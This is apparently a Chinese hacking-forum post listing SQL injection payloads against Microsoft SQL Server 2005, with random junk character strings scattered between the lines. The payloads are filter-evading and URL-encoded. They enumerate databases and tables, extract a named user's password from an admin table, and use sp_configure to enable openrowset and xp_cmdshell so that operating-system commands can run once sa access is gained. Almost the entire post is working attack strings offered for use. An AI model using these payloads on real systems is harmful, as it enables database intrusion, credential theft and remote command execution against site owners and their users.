MSsql2005注入语句

admin

1 W1 S1 c. O, e2 T* F6 @" ^
$ S: q# d3 O5 H
[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
' _( |1 |# J* F. h! Z) R+ L
; n0 q1 s+ l; E  k爆表语句,somedb部份是所要列的数据库，红色数字1累加
1 w% F) ^% i: m) W
; x. M  U% ^4 h# P1 X
[Copy to clipboard]CODE:
6 V3 J$ }4 w0 ~1 ], {- w6 q4 f# ]) p/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

& d4 J7 w  \, F1 S7 N0 s  f爆字段语句，爆表admin里user='icerover'的密码段

/ W3 b6 o  b0 _. t
[Copy to clipboard]CODE:
. g/ R. E' i7 A) h! N**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
2 w0 a6 D- b: V% A" e( S; p
mssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
开启openrowset


[Copy to clipboard]CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
" u' o( h+ {/ L' ]! I; m$ j9 }4 `5 W/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

开启xp_cmdshell
! ]+ q% |1 D3 w4 b; p
$ p9 M: {" |5 j% d
[Copy to clipboard]CODE:
1 R* k+ B( V4 [/ lEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
: k# e; W8 e6 M% d: gEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

5 C; X9 b0 D. Q* ^" R- K: x. Z9 jok,over~~晚安